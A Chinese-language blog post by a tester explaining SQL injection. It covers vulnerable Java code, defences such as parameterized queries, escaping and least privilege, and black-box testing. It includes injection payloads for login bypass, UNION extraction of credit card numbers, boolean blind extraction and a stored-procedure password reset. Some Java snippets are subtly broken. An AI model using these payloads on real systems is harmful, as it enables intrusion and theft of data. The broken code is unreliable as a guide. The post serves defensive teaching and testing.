Web十大安全隐患之SQL注入

上一篇 / 下一篇  2014-10-16 21:43:48



注入往往是应用程序缺少对输入进行安全性检查所引起的,攻击者把一些包含指令的数据发送给解释器,解释器会把收到的数据转换成指令执行。常见的注入包括 SQL注入,OS Shell,LDAP,Xpath,Hibernate等等,而其中SQL注入尤为常见。这种攻击所造成的后果往往很大,一般整个数据库的信息都能被读取 或篡改,通过SQL注入,攻击者甚至能够获得更多的包括管理员的权限。
       
    先来说说sql注入漏洞是怎么产生的,或者说对于一个程序开发人员应该怎么防范SQL注入的吧。
 
    SQL注入往往是在编写包含用户输入的动态数据库查询时产生的,但其实防范SQL注入的方法非常简单。程序员只不再写动态查询,或防止用户输入包含能够破坏查询逻辑的恶意SQL语句,就能够防范SQL注入。当然,我作为一个测试人员说起来很容易,做起来就难了。
  我本人只会java,所以后边我就用Java代码作为示例:
1. <font face="宋体" color="#000000">String query ="SELECT account_balance FROM  user_data WHERE user_name ="
2.     + request.getParameter("customerName");
3.    
4.   try {
5.   Statement statement =
6.   connection.createStatement( …);
7.   ResultSet results =
8.   Statement.executeQuery(query);
9.   }</font>
 
 
  在以上代码中,我们可以看到并未对变量customerName做验证,customerName的值可以直接附在query语句的后面传送到数据库执行,那么攻击者可以将任意的sql语句注入。
 
    上边说到怎么产生的,我们接着说怎么样才能让sql注入的漏洞避免。本来计划把这一段放在如何测试之后再介绍,但是貌似先介绍出来更方便理解。
 
防范方法一 :参数化查询
  参数化查询是所有开发人员在做数据库查询时首先需要学习的,参数化查询迫使所有开发者首先要定义好所有的SQL代码,然后再将每个参数逐个传入,这种编码风格就能够让数据库辨明代码和数据。
  参数化查询能够确保攻击者无法改变查询的内容,在下面修正过的例子中,如果攻击者输入了UsrID是“’or ‘1 ‘=’1”,参数化查询会去查找一个完全满足名字为‘or ‘1 ‘=’ 1的用户。
  对于不同编程语言,有一些不同的建议:
  Java——使用带绑定变量的PreparedStatement();
   其他的:。。。不好意思,真不会
  示例:
1. <font face="宋体" color="#000000">String custname = request.getParameter("customerName");
2.   String query ="SELECT account_balance FROM user_data WHERE user_name= ?";
3.    
4.   PreparedStatement pstmt = connection.prepareStatement(query);
5.   Pstmt.setString1,custname();
6.   ResultSet results = pstmt.executeQuery();</font>
 
防范方法二:存储过程
  存储过程和参数化查询的作用是一样的,唯一的不同在于存储过程是预先定义并存放在数据库中,从而被应用程序调用的。
  Java存储过程示例:
1. String custname = request.getParameter("customerName");
2.   try {
3.         CallableStatement cs = connection.prepareCall("call sp_getAccountBalance(?)}");
4.         cs.setString(1,custname);
5.         Result results = cs.executeQuery();
6.   }catch(SQLException se){
7.   //error handling
8.   }
 
防范方法三:对所有用户输入进行转义
  我们知道每个DBMS都有一个字符转义机制来告知DBMS输入的是数据而不是代码,如果我们将所有用户的输入都进行转义,那么DBMS就不会混淆数据和代码,也就不会出现SQL注入了。
  当然,如果要采用这种方法,那么你就需要对所使用的数据库转义机制,也可以使用现存的诸如OWASP ESAPI的escaping routines。ESAPI目前是基于MySQLOracle的转义机制的,使用起来也很方便。一个Oracle的ESAPI的使用示例如下:
1. ESAPI.encoder().encodeForSQL(new  OracleCodec(),queryparam);
 
  那么,假设你有一个要访问Oracle数据库的动态查询代码如下:
1. String query ="SELECT user_id FROM user_data  WHERE user_name = ‘"+req.getParameter("userID")+"’ and user_password = ‘"+req.getParameter("pwd")+"’";
2.   try {
3.         Statement statement =  connection.createStatement(…);
4.         ResultSet results =  statement.executeQuery(query) ;
5.   }
 
  那么,你就必须重写你的动态查询的第一行如下:
1. Codec ORACLE_CODEC = new OracleCodec();
2.   String query ="SELECT user_id FROM user_data WHERE user_name = ‘"+
3.  ESAPI.encoder().encodeForSQL(ORACLE_CODEC,req.getParameter("userID"))+"’ and user_password = ‘"+
4.  ESAPI.encoder().encodeForSQL(ORACLE_CODEC,req.getParameter("pwd"))+"’";
 
  最小权限法:
  为了避免注入攻击对数据库造成的损害,我们可以把每个数据库用户的权限尽可能缩小,不要把DBA或管理员的权限赋予你应用程序账户,在给用 户权限时是基于用户需要什么样的权限,而不是用户不需要什么样的权限。当一个用户只需要读的权限时,我们就只给他读的权限,当用户只需要一张表的部分数据 时,我们宁愿另建一个视图让他访问。
  如果你的策略是都是用存储过程的话,那么仅允许应用程序的账户执行这些查询,而不给他们直接访问数据库表的权限。诸如此类的最小权限法能够在很大程度上保证我们数据库的安全。
  输入验证白名单法:
  输入验证能够在数据传递到SQL查询前就察觉到输入是否正确合法,采用白名单而不是黑名单则能在更大程度上保证数据的合法性。
 
上面说的是关于sql注入漏洞的产生和开发人员的防范方式,那么对于我们测试人员来说,如何测试sql注入漏洞是否存在呢?
  首先,我们将SQL注入攻击能分为以下三种类型:
  Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上;
  Out-of-band:数据通过不同于SQL代码注入的方式获得(譬如通过邮件等)
  推理:这种攻击是说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。
  不论是哪种SQL注入,攻击者都需要构造一个语法正确的SQL查询,如果应用程序对一个不正确的查询返回了一个错误消息,那么就和容易重新 构造初始的查询语句的逻辑,进而也就能更容易的进行注入;如果应用程序隐藏了错误信息,那么攻击者就必须对查询逻辑进行反向工程,即我们所谓的“SQL盲 注”
  黑盒测试及示例:
  这个测试的第一步是理解我们的应用程序在什么时候需要访问数据库,典型的需要访问数据库的时机是:
  认证表单:输入用户名和密码以检查是否有权限
  搜索引擎:提交字符串以从数据库中获取相应的记录
  电子商务站点:获取某类商品的价格等信息
  作为测试人员,我们需要列对所有输入域的值可能用于查询的字段做一个表单,包括那些POST请求的隐含字段,然后截取查询语句并产生错误信 息。第一个测试往往是用一个单引号“‘”或是分号“;”,前者在SQL中是字符串终结符,如果应用程序没有过滤,则会产生一条错误信息;后者在SQL中是 一条SQL语句的终结符,同样如果没有过滤,也会产生错误信息。在Microsoft SQL Server中,返回的错误信息一般是这样:
1. Microsoft OLE DB Provider for  ODBC Drivers error ‘80040e14’
2.   [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before  the character string ‘’.
3.   /target/target.asp, line 113
 
  同样可用于测试的还有“--”以及SQL中的一些诸如“AND”的关键字,通常很常见的一种测试是在要求输入为数字的输入框中输入字符串,会返回如下的错误信息:
1. Microsoft OLE DB Provider for  ODBC Drivers error ‘80040e07’
2.   [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the  varchar value ‘tester’ to a column of data type int.
3.   /target/target.asp, line 113
 
  类似上面这样的出错返回信息能让我们知道很多数据库的信息,通常不会返回那么多信息,会返回诸如“500 Server Error”的信息,那就需要“盲SQL注入”了。注意,我们需要对所有可能存在SQL注入漏洞的输入域进行测试,并且在每个测试用例时只变化一个域的 值,从而才能找到真正存在漏洞的输入域。
 
下面我们看一下标准的SQL注入测试是怎样的,这段我在上边的帖子里说过了,这里再详细重复一下
  仍然以下面的SQL查询为例:
1. SELECT * FROM Users WHERE  Username='$username' AND Password='$password'
 
  如果我们在页面上输入以下的用户名和密码:
1. $username = 1' or '1' = '1
2. $password = 1' or '1' = '1
 
  那么整个查询语句就变为:
1.  SELECT * FROM Users WHERE  Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
 
  假设参数值是通过GET方法传递到服务器的,且域名为www.example.com,那么我们的访问请求就是:
1. [url]http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1[/url]
 
  对上面的SQL语句作简单分析后我们就知道由于该语句永远为真,所以肯定会返回一些数据,在这种情况下实际上并未验证用户名和密码,并且在某些系统中,用户表的第一行记录是管理员,那这样造成的后果则更为严重。
  另外一个查询的例子如下:
1.  SELECT * FROM Users WHERE ((Username='$username')  AND (Password=MD5('$password')))
 
  在这个例子中,存在两个问题,一个是括号的用法,还有一个是MD5哈希函数的用法。对于第一个问题,我们可以很容易找到缺失的右括号解决, 对于第二个问题,我们可以想办法使第二个条件失效。我们在查询语句的最后加上一个注释符以表示后面的都是注释,常见的注释起始符是/*(在Oracle中是--),也就是说,我们用如下的用户名和密码:
1. $username = 1' or '1' = '1'))/*
2.     $password = foo
 
  那么整条SQL语句就变为:
1. SELECT * FROM Users WHERE  ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))
 
  我们的URL请求就变为:
1. [url]http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'[/url]))/*&password=foo
 
 
Union查询SQL注入测试
  还有一种测试是利用Union的,利用Union可以连接查询,从而从其他表中得到信息,假设我们有如下的查询:
1. SELECT Name, Phone, Address FROM  Users WHERE Id=$id
 
  然后我们设置id的值为:
1. $id=1 UNION ALL SELECT creditCardNumber,1,1  FROM CreditCarTable
 
  那么整体的查询就变为:
1. SELECT Name, Phone, Address FROM  Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable
 
  显然这样就能得到所有信用卡用户的信息。
  SQL盲注测试
  在上面我们提到过盲SQL注入,即blind SQL injection,它意味着对于某个操作我们得不到任何信息,通常这是由于程序员已经编写了特定的出错返回页面,从而隐藏了数据库结构的信息。
  利用推理方法,有时候我们能够恢复特定字段的值。这种方法通常采用一组对服务器的布尔查询,依据返回的结果来推断结果的含义。仍然延续上面的www.example.com,有一个参数名为id,那么我们输入以下url请求:
1. [url]http://www.example.com/index.php?id=1'[/url]
 
  显然由于语法错误,我们会得到一个预先定义好的出错页面,假设服务器上的查询语句为SELECT field1, field2, field3 FROMUsers WHERE Id='$Id',假设我们想要得到用户名字段的值,那么通过一些函数,我们就可以逐字符的读取用户名的值。在这里我们使用以下的函数:
1.  SUBSTRING (text, start, length),ASCII (char),LENGTH (text)
 
  我们定义id为:
1.  $Id=1' AND  ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
 
  那么最终的SQL查询语句为:
1. SELECT field1, field2, field3  FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'
 
  那么,如果在数据库中有用户名的第一个字符的ASCII码为97的话,那么我们就能得到一个真值,那么我们就继续寻找该用户名的下一个字符;如果没有的话,那么我们就递增猜测第一个字符的ASCII码为98的用户名,这样反复下去就能判断出合法的用户名。
  那么,什么时候我们可以结束推理呢,我们假设id的值为:
1. $Id=1' AND LENGTH(username)=N  AND '1' = '1
 
  其中N是我们到目前为止已经分析的字符数目,那么整体的sql查询为:
1. SELECT field1, field2, field3  FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1' = '1'
 
  这个查询的返回值如果是真,那我们就已经完成了推理并且我们已经得到了想要的数值,如果为假,则表示我们还要继续分析。
  这种SQL盲注会要求我们输入大量的sql尝试,也有一些工具能够帮我们实现。我所用过的只有sqlmap,以后再介绍。
 
存储过程注入
  在上面写的内容中,提到使用存储过程是能够防范SQL注入的,但同时也要注意,存储过程如果使用不得当,使用存储过程的动态查询事实上也会造成一定的SQL注入漏洞。
  以下面的SQL存储过程为例:
1.  Create procedure user_login  @username varchar(20), @passwd varchar(20) As
2.     Declare @sqlstring varchar(250)
3.     Set @sqlstring = ‘
4.     Select 1 from users
5.     Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
6.     exec(@sqlstring)
7.     Go
 
  用户的输入如下:
1. anyusername or 1=1'
2. anypassword
 
  如果我们没有对输入进行验证,那么上面的语句就会返回数据库中的一条记录。
  我们再看下面的一条:
1.  Create procedure get_report  @columnamelist varchar(7900) As
2.     Declare @sqlstring varchar(8000)
3.     Set @sqlstring = ‘
4.     Select ‘ + @columnamelist + ‘ from ReportTable‘
5.     exec(@sqlstring)
6.     Go
 
  如果用户输入是:
1.  1 from users; update users set  password = 'password'; select *
 
  后面则显而易见,用户的所有密码都被更改且得到了报表信息


TAG:

 

评分:0

我来说两句

Open Toolbar